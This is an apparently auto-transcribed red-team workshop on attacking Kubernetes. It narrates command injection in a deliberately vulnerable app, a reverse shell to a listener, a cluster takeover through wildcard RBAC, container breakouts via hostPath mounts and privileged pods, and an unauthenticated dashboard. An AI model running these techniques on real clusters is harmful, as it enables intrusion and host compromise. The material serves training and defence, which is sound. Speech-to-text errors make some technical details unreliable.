Workshop on Attacking a Kubernetes Cluster
Host: Welcome to another part of Kubernetes Learning series. In part one, we focused on Kubernetes and workloads in general, along with some open-source tools. Today in part two, we will focus on approaches for attacking a Kubernetes cluster from a red teaming perspective. This also helps in understanding how an attacker thinks and their mindset while exploiting Kubernetes cluster choice. Divyanshu welcome back to the show. Looking forward to this exciting part.
Divyanshu: I'll just very quickly explain, what is this application? So it is just taking Get and post request.
It will create a password via taking your email and password. It will help you get the password based on whatever email you will provide in the parameter. And there is that functionality which is still in the beta, which is redirect, and it is using a tiny DB. And these are some libraries which I've mentioned, which I've used for this application. This is an open source application. I'll give you the link which you can paste in the section and everyone can go. And so I'll just open the source code, although I'm not explaining sure.
So this is the insecure Python app. It is very easy to deploy and it is extremely simple application I just wanted to have for my Kubernetes cluster. If you'll see, it is just 139 lines of code, right? And it helps basically me or everyone around me to understand how to deploy a Kubernetes.
I think we have already gone through these files. So I'll just quickly go to our application card where I'll try to I'll use this Http for connecting to this application via CLI so that I can very quickly walk you through how I'm connecting to these APIs. So we can also do it via UI also. But I'll prefer CLI because we are doing everything on the CLI. So it would be easy for me to explain.
Host: Yeah, makes sense.
Divyanshu: I've deployed this, so it is an API testing client which we'll use. And I'll just copy paste these commands and I'll create a file so that I can show everyone. So instead of using the domain, right now, I'm using the IP. So I'll just replace this with the IP. So this is my first command, if you'll see, and I'll remove the part, you'll see http get so I'm just sending the Get request. That would be my first request. And then I'll try to create the password via my email.
So I'll just replace this part and I'll replace it with my values. And now you can see I'm sending a post request to the Create password endpoint using test email. And the password is my password. So obviously, because it's an Insecure application, so that's why it is taking easy password. It is not doing anything.
Host: The next command is it's not recommended for our audience, correct?
Divyanshu: So I don't want folks creating using this application for any production or any kind of deployment. Right? So the next part is it is trying to get the password via get password API and I just have to pass the email which I've used to create the password. And then the last part is kind of SSRF scenario which I've intentionally created to show how it would work. Because I'm showing this or if I'm deploying this application in the EKS, right, in those cases I would be able to hit that metadata endpoint and get the Credential. So, although in this scenario, in this lab, this is not required, we won't be doing this. Instead we would be going to the next part where we would have an RC. And let me show you the RC part here itself.
So, let me show you first. So, there is this app route. You will see, right there is this date endpoint which basically in the training or in the workshops like the participants, basically they try to read the source code and they try to find out which application like which endpoint is vulnerable to RP or the command execution. But I'm just explaining the same. So you can see there is a date endpoint which is taking exec as the parameter and then it is having a subprocess which is causing the command injection and there is no sanitization or any kind of validation. So it will take whatever I'll pass anything, correct? Right, I'll just show you. It is basically date and the exit.
So we just need two values. So I'll just have date as the endpoint. Then I'll have LS.
Host: Okay, so you are running a command remotely on the server.
Divyanshu: Correct. So first I'll try to show the application itself from the CLI, try to access it. So you'll see it is showing me the whole content that insecure password manager. And now I'll try to create the password for the email. So you can see it is showing success password added to the manager. And then the next is I'll try to get password for the user at the rate@gmail.com and it is saying the email is this, the password is this.
Last I'll directly come to this RC part and I'll try to see if it is vulnerable to RC. Although in real world we have to test and try multiple ways. You can see, right, I'm able to do an LS and you can see there is a docker file, Jenkins file. There are so many things right now I can start reading the requirements TXT, maybe the DB, JSON Jenkins file. We have multiple kind of data here, right? So we can try to exploit and see. I'll show you a couple of more ways. So, how we'll get to know if we are inside the Kubernetes?
So, we'll do a print env here. So when I'll do this command, it will show me the output. You'll see like the moment output is on the terminal, you can see a Kubernetes port. Is there a Kubernetes service port? Is there vulnerable service full port.
Host: So all these things you can so all the environment variables you can find out from here. So if there is any secrets or anything, also you can access that, right?
Divyanshu: Correct. So that is why if you are injecting secrets here, it would come directly in the environment variable.
Although we have not done that. So it is not there, hopefully.
But it also gives us an idea that it is not a docker application. Rather it is a container or a pod running inside a Kubernetes cluster. If you'll see from the output. Right. So it would give multiple things from here. It would give me the endpoint itself and what language is used. So you will get so many things just by looking into the environment variable.
So this is the easiest way of fingerprinting or finding whether once I have an RP, whether my application is running on the host itself or on the cluster or the Kubernetes itself. So based on that, we can basically decide which attack path I want to go. Right? Right. Is like the basic setup and the RC. Now I'll try to exploit this application. So I'll just redeploy Python Pip just because I don't want to have an error again. So that is why I'll redeploy if it is not there.
And I think Pip was not there because I will be using one more tool which is called as pawn Cat. Okay. It is very much similar to Netcat for the reverse shell, but a little bit advanced and easy to use. Like netcat is due to binaries and versions. Sometimes it is difficult and even folks will have different version of netcat, right? So there can be some kind of confusion between these students or the people who are basically following this, that my netcat is not working. I do have a netcat. So that's why I'm using a different tool, which is again, you can just see on the GitHub and you can read the dogs.
You can see how it works and everything. So it is deployed. Now as an attacker, I'll just open my rivershell. Basically, I'll start my listener before I open the reverse shell.
So I'm listening on zero and the port is 8182 and it is saying that bound to this specific IP and the port let me close this. And then this side is from the victim. So let's suppose we have found an RC. Like actually we have found an RC. So I'll just try to have the Python payload. So I'll just copy paste that Python payload and just wrap the line. Sure.
You'll see here, right? I'm just saying whichever port like I want to have the reversal. Then this is the command for getting the reversion. I'm just sending the bin bash to that current IP. So you will see, right, I'm using curly F, one pig. In real world here, I have to put the attacker's IP or like attacker would put his IP. Right? Now we are on the same machine. So that is why I'm putting the live config.
So this command will basically print everything for me on the terminal, which I can easily go and copy paste. So that is why I have just created this. You'll see, it is now encoding everything. So then it would be very easy for me to just paste the command here and just send it, right? So without any hassle, and I already have my rivershel listener running, sorry. And when I think I have, I think I copied the whole line. So just let me get this one.
Yeah, sure. So now, you'll see, when I'll go to this, you can see, right, we have received a communication from 18 to 799141 114, which is obviously the same IP from where I'm running. But in real scenario, this would be the victims IP from where the reverse shell or the shell would come. So now I'll hit CTRL D and I'll get the regular shell. So you can see now I'm inside the vulnerable app deployment pool. So this is not our regular terminal, it is the container or the pod where I've got the access.
Host: So this is very much like doing a shell into one of the containers, but from a remote location altogether, right, without having any access to the Kubectl permissions or anything like that.
Divyanshu: Correct. So now we'll see from here, see, the first thing you can see, right, this container is running as root. So because of which we would have more privileges. Now I can install anything, I can do app update. So without these privileges of root, I wouldn't be able to do that, right? So now you can see I was able to run app update, so now I can install anything. So here, as you have seen till now that we were using a cubectl.
So definitely I would like to install the cubectl and before that, as it is mentioned here, so I'll just hit an env print, env and envy, both are almost the same commands and it will give me the environment variable. And then the next is I can try to install the nmap. So because of the time constraint, I'm not doing that. And curl I would install because I want to install the Kubectl binary. As we know that we are using Kubectl to connect to the Kubernetes cluster, and there was a service account mounted. So I'll just use this to download the Kubectl binary and install it in the path so that I can access like connect to the Kubernetes cluster via Kubectl. I'm just closing this and I'm just using the install command to install it.
This would do everything for me. Now, if I'll run this kubectl auth, can I list? So this command would give me what I can do, right? So you can see, because I had everything star, star. So now it's giving me that I have all the permissions I can do. Get these are the APIs, I can get whatever I want. I have full control over the cluster because I was able to install the Kubectl. Then on the top of that I was having an R back with full permission. So because I had full permissions, now I can go and create the cluster, I can delete it, I can do whatever I want, right?
Host: So it's very much like an admin in any cloud environment, right? Correct, right.
Divyanshu: So here you'll see I've done an Nmap, which I'm not doing, but I'll show you one last command which would help us to get an idea. So if you'll see cluster info, I'm now able to dump the cluster info. I am able to get the nodes and pods and services everything, right? So now I have complete access, I can do whatever I want. So this is a complete Kubernetes or like the cluster compromise scenario. So now, because I have full permission, I can go and maybe create another pod or delete everything, right?
Host: No, I was saying that we look at two things, right? One is the remote code execution vulnerability and from that we could all the way get to reverse shell. And now you have complete control of the cluster.
Divyanshu: Correct. So plus, if you will see the YAML, there was no restriction on the deployment of the container itself. So I was able to like this pod was deployed as a root, right? It was running as a root. So when the attacker got the access, I was able to run commands as root.
So this is actually the real world scenario which I have tested and did in one of my pen testing engagements where I did a nuclei scan on the domain and from there I was able to get inside a container and because the container itself was running as root. So I just did an exec into another container and it was in cloud environment. So there that container was having full permissions, like the admin policy was attached. So it led to an AWS compromise in that case. So just because I had RC in the application, then there was a full Rband there, the container was running as room, I was able to take over the entire AWS.
So this is how bad these misconfigurations are. So I think this is pretty much it from the part of RBAC and no, exploiting a parent application, we have done that and now in the next part we would see the container breakout scenarios. So I'm not going to use the same container, I would be showing a different container where we would just focus on the breakout scenario. But once we have exploited the container, now from there, like if I want to go to the host, right, if I want to get the complete host access, or my machine access, or my server access. So in those cases, I need to check and find a way to break out of this container and get into the host on which this container is running or the pod is running. This cluster is running. Yeah, correct.
So this is the next scenario. So these are some common breakout scenarios. If I'll read it out PID like the process ID mounting, the network mounting IPC. True. So IPC is just the interprocess communication namespace. So this namespace is shared between the multiple pods. So suppose my export is having no IPC two and there is a malicious pod running with the IPC two.
They would have the shared interprocess communication and if any secret is stored by XPod to that place, malicious pod also can go and read it. So that is why this is bad. Plus the volume mount, which we would see where I am going to mount the host volume and then couple of like the privilege proof where I am giving excessive privileges to my containers, then docker and docker. This is how basically our Kind is running right now. But in the scenarios where we don't have Kind, right? Or in the real applications where we don't use Kind. In those cases, if I have access to this docker mount socket or where I can directly run the docker commands inside the pod, in those cases I can create another docker, or I can directly delete all the containers and do much more because I would have access to the docker socket. And from there I can communicate to the docker sock, which is basically having more permission directly. Correct? Right.
Host: So here you have listed ten to eleven container breakout scenarios. Is this the finite list or there are more such scenarios which can be used by attackers?
Divyanshu: No, there are more scenarios. Plus attackers are finding zero days also. Right? If I'll find a zero day which gives me explicit container breakout like if I have found any process which is running into the container and the same process may be used in the host and I have found some way, maybe via brute forcing or any way via race condition or some way I was able to access the host Right. This would lead to a container breakout. So there are more advanced injections possible where you have to write the shell in the C language and then try to exploit it.
Because these are extremely simple to demonstrate and these are extremely common in the current infrastructure. That is why I've mentioned these scenarios.
Host: Okay, makes sense. Okay, so out of these, which one you want to maybe show today from a breakout?
Divyanshu: I'll show this host volume mount, path one, and this unauthenticated Kubernetes dashboard. Okay, because for the dashboard, I've already deployed this dashboard. So that is why I don't have to redeploy it. And I have a YAML for this host volume mount. So that is why I would show that as well. And host volume mount and Privilege two are very much similar. I'll explain the difference when I'll start the lab itself.
And I would like to thank I have taken these breakout scenarios from their GitHub so I just want to give them the credit. Like I have not listed these YAML, I'm just using this for our scenario.
Host: Okay. When we publish the video, we'll make sure to tag them as well so that they get the due credit.
Divyanshu: Cool. So this is the host volume mount. So host volume mount container breakout refers to the vulnerability where I am mounting the host file system into the pod or into the container.
An attacker is able to gain the unauthorized access of the host file system.
Host: So you sort of have access to the entire file system on the host, not just what the container has by default access. Correct, this is true. So I'm just going into the directory where I have this hostpod YAML and I'll quickly explain this as well.
Okay, just let me reconfirm it's. Four, five and then host volume. Yeah. So this is the deployment is Pod. I just don't want to bring this up again. And the image type is Alpine and you can see I'm mounting on this host and on the host I'm mounting my root. So I'm mounting the root directory of the host to the slash host.
So because I'm mounting the root so whatever would inside would stay inside the root. That is right. Everything like everything is inside this slash itself. So from the container or from the pod I would be able to access everything. So we'll just quickly see the scenario. I've explained the YAML so I just apply this. We can either create or do an apply here.
So both works apply is usually once we have configured or created something, when we want to reapply, we use apply. But I am using it here itself. So you can see the host path pod is created and for the post exploitation I'll do a CD into that mounted host path and do an LS from the container from the pod which we are running right now. So I'll do it very quickly. You can see it is showing me all these files or these are the file system of the host itself. Now I'll create a file inside my host file system. So right now it won't be my EC two instance, it would be my docker container which is on which this node is running because we are running Kind, right? So Kind node is running on the top of another container.
So it would basically access the container not the easy to host. Just so that people are not confused like why it won't be visible from the EC two. Like in real scenario, it won't be visible on the host operating system or on the main server where our pod is running. Correct. So I just created this file and now I'll access this file again from our host. This command, I'll just explain the command as well. So here you can see, I'm just listing the Pod and the node on which my Pod is running.
Then I am doing a docker peers, and from there I'm getting the node name and you can see I'm doing a docker exec and trying to cat that file which we have created via cubectl. Basically, the Pod was running and we were able to create a file here. Now I'm trying to access the same file via docker access because Kind is running on the docker. So you can see I was able to access this file via docker itself. So here it was possible to break out of the host of that container and access the host file system, which is our container file system, where our node is running.
Host: Again, you could access the root directory, you could create a file in the root directory and later on we could read from it as well.
Divyanshu: Correct. So this is the same thing which is mentioned, I'm just reading it out, get the node name from the host pod and get container ID and then execute the cast cat host file command inside the container. This is the same thing, but we have discussed right now. So this was the easiest container breakout, if you would see, just because like a team or someone who did the host path and mounted everything, right? So that is why it was possible for me as an attacker to get access to the file system. Because I have access to the entire file system, I can make any changes.
Right? I'll just go and quickly delete this lab and we'll move to the next section where I have the privilege. True. So privileged. True gives on the Pod level, it bypasses the security boundaries and gives extra permissions, like the kernel level settings to the Pod which is running. So I'll again show you YAML before we
Host: so it's more like a container with elevated privileges, right? Correct.
Divyanshu: So I'll just explain you the line. So here in the security context, we have mentioned privilege. True. That means I'm telling that my Pod is running with extra privileges or the extra capabilities and rest. Everything is same. Like, it is just a Pod image. One, two and this is just no, I'm running it in the loop so that my Pod is not dying alive.
Yeah. So I'll just apply this malicious YAML and the Pod is created. Now, when I'll do the couple of commands, I'll explain the command here itself. So, first I'll see first I'll see that lsblk, like what are the file system which is present via this lsblk command? This is a classic Linux command. And you can see the name is xray DBA one. Okay. And then I'll create the host directory.
Basically, if you'll see here this is exactly the same thing which we did in our host volume scenario. I was writing in the YAML itself that I am mounting like I have a slash host and I'm mounting into the root because I have elevated privileges right now with privilege true, I'll create a directly directory here and now I'll do the same thing again. If you will see the next command, I'm again mounting it xvdbf one onto that host and you will see there was no error. So this was possible because I had elevated privileges, right? And I'll run a ch root. So ch root will give basically this host itself, it is just to change the root. And now you will see I am having this directly I'm inside some root. Now, we don't know still what it is, but in reality this is our node where our container is running.
We were successfully able to break out here and now if I'll do an LS, I'll show you. So you will see it is even because right now my EC two instance is shared with the node and my node is sharing the same with the container or the pod. So that is why in this scenario I was able to see my EC two data. Like this is the course which right now we are. So that possible because I had access via the privileged group and now I can go and privilege container. Yeah, correct. So this is how the Privileged breakout scenario works.
So these are very easy to learn and understand scenario and the Bishop Fox has given a couple of more here. So if anyone is interested, they can go and read all these scenarios. They have a huge list, like there are total seven or eight scenarios lovely. Basically, which helps anyone to understand how the basic breakout scenarios would work. Then there are some CVS which came in the last years, like Ram. So all these things, if anyone is interested, they can read and try to check all these things in the real world, like whether these vulnerabilities are present and they can try to basically use these issues during the Pen test.
Now, coming to the last attack, which we will see in this demo, so I would just directly go into the endpoint. So you will see this is the Kubernetes dashboard. So whenever the applications are deployed in the Kubernetes DevOps or the SRE guys, they also deploy a Kubernetes dashboard. So when there is a misconfiguration where we allow skip or we allow anonymous login into the Kubernetes dashboard, we have this escape button. If I'll zoom out, you see there is this escape button. So if the vulnerability is not there, you will see a Kubernetes dashboard exposed, but there won't be this escape button because this escape button is present. I can simply go and click on this skip and for me this will escape and this will show me everything.
So now I can see all the containers running. You can see Paul Go is running, right? I can see the type of workload service config map cluster so now you'll see from here also I have access to everything even though there was that authentication page you could bypass that, right?
Host: In a way because you did not have to provide any authentication because you could skip.
Divyanshu: Okay, so in real YAML, which is provided by the Kubernetes on the GitHub, there is this skip button or this misconfiguration is not there because I was demonstrating it in the lab. So that is why explicitly I have created this setup. So if the Kubernetes dashboard is running, maybe a very old version, or someone has explicitly created this misconfiguration, then only this would exist. Or if they have some specific use case, I don't know what, but if they have some bad use case in those cases, only this would button would appear.
Which makes sense. And I was about to ask you that. Why would somebody have the skip button? If you want to enforce authentication? But okay, now it is clear maybe like you can or we can try to access showdown and see based on the fingerprinting if we have something in the real environment. I don't want to show this in the workshop because I don't want to get exploited anyway, this is correct. We have completed the attack part and it brings us to the end of how we attack the Kubernetes infrastructure. So these are some basic attacks and post exploitation techniques which we have talked about. So over to you Purusham, if you have any question or anything because this was too much for the first time to see and then going through all these at once.
Host: Yeah, so I have many questions, some around the attack itself and mostly around the defense side. So you showed a few things, right? Remote code execution, the RBAC policies where you have star permissions.
Is there any scenario where these are legitimate?
Because we can understand that. Yeah. Ideally this is not best practices that you should have host access or you should have start star permissions. But is there any scenario where you see that that is from a business perspective?
Divyanshu: It is okay from business perspective. I don't think this should be required. Maybe in the testing or when the developers, application developers are getting started, they can have this in their test environment, although they should not expose it publicly. But if they want to test or they want to understand how these things are working in those cases, only they should have this, like real world scenario won't have something where it is misconfigured. Right. Like all the applications need a specific access maybe to a specific pod or the namespace it would be very specific, like I don't think any pod would go and create any pod. Right, so those things are not required.
Host: Correct. Okay, the other question that I have is. You mentioned about three types of ways to sort of enable or create a service, right? Node port, cluster IP, load balancer.
Let's say if I'm creating a cluster and deploying it in AWS, in which scenarios you would suggest me use cluster IP and in which scenarios you would suggest me use load balancer.
Divyanshu: Whenever we have an application and I directly want it to be accessed outside from the external environment or from the internet, in those cases we can have the load balancer. So if I'll put load balancer right, now in this YAML, where we had this sample app, if you'll see the type is node port, if I mentioned the load balancer, this won't come up because in bare metal we don't have or like on the EC Two, we don't have any load balancer, right? It is explicit to the cloud environment, correct? So there it would create a cloud load balancer for you.
It would directly map your container with that. So your application would be accessible directly. Like you don't have to do explicit mapping. Like in the case of node port, it will give you a public IP. Like if you are not in the private subnet and you have that public IP pool. So in that case you will get this public IP and application would be accessible outside the cluster. Like if it is within the private subnet, obviously you won't be able to access it, but if it is accessible, like your networking configuration allows that public access and this is the node port, in that case my Pod would be accessible outside this cluster itself.
And when we talk about the cluster IP, it is within the cluster. Like I have Pod One and Pod Two running within the cluster and I want some kind of communication happening like a microservice which wants to talk internally, right? In that case I will have cluster IP where the communication is happening within the cluster. So that is the main difference between these.
Host: Okay, one follow up question is the load balancer, right? Let's say I have a user facing app. I created a load balancer. It has to use some of the networking components of AWS, right, so that I can access from the outside world what components are used and do I need to do any special configuration for that?
Divyanshu: No special configuration, like it would be very much similar to any application running your NAACL, your private subnet, your VPC and security group, all these things needs to be in place, right? It is how a generic application work. Like if I will block all the network access, like I would give again an analogy that if I have my main door locked, right, and everything inside my house is open, then also anyone can't come inside my house because the main door itself is locked. So that is very much similar because I haven't provided the networking access to basically the communication, the ingress and egress the incoming or the outgoing traffic. The traffic flow won't happen. Although my application is allowing, but my network is not correct.
Host: Okay, that makes sense.
I think I have more questions from a defense perspective. One last question that I have is, like, whatever setup we saw, would the same apply to a Windows based, let's say, OS? If your host OS is Windows, will everything work? Let's say if I create the service, the application, like all the YAMLs that you showed, right? Will they work as is, or we need to make any changes in that scenario.
Divyanshu: So I haven't used Windows much, or like, I haven't seen on the server side, anyone using Windows. But if we'll talk about the Kubernetes, it should run in the similar way, because I haven't seen all these things in the reality. So I exactly don't know the answer. Because for Net and all those applications, maybe there would be some specific changes required, maybe on the host level, but on the network level, everything would be same. Right.
So maybe on the configuration plan, something would change, but I'm not sure about that. I need to check. Okay.
Host: No, that's fair. That's understandable. And I have seen something very similar that most of the Kubernetes practitioners use, like Linux based or Ubuntu based host OSs. So that should cover majority of the landscape. Okay. So I think all of my questions around the attack side I have got answered. So once we go into the defense side, I'll have more questions.
Divyanshu: Got it? Sure.
Host: Thank you, everyone, for joining us in the part two of this workshop. This is part two of a multipart series focusing on Kubernetes learning, attack, and defense. We hope you found part two informative and engaging. Stay tuned for part three, where we'll dive deeper into practical strategies of defending a Kubernetes cluster. That gives us an understanding of how and what are some of the best practices to follow when defending Kubernetes clusters from attackers. See you soon. Thank you.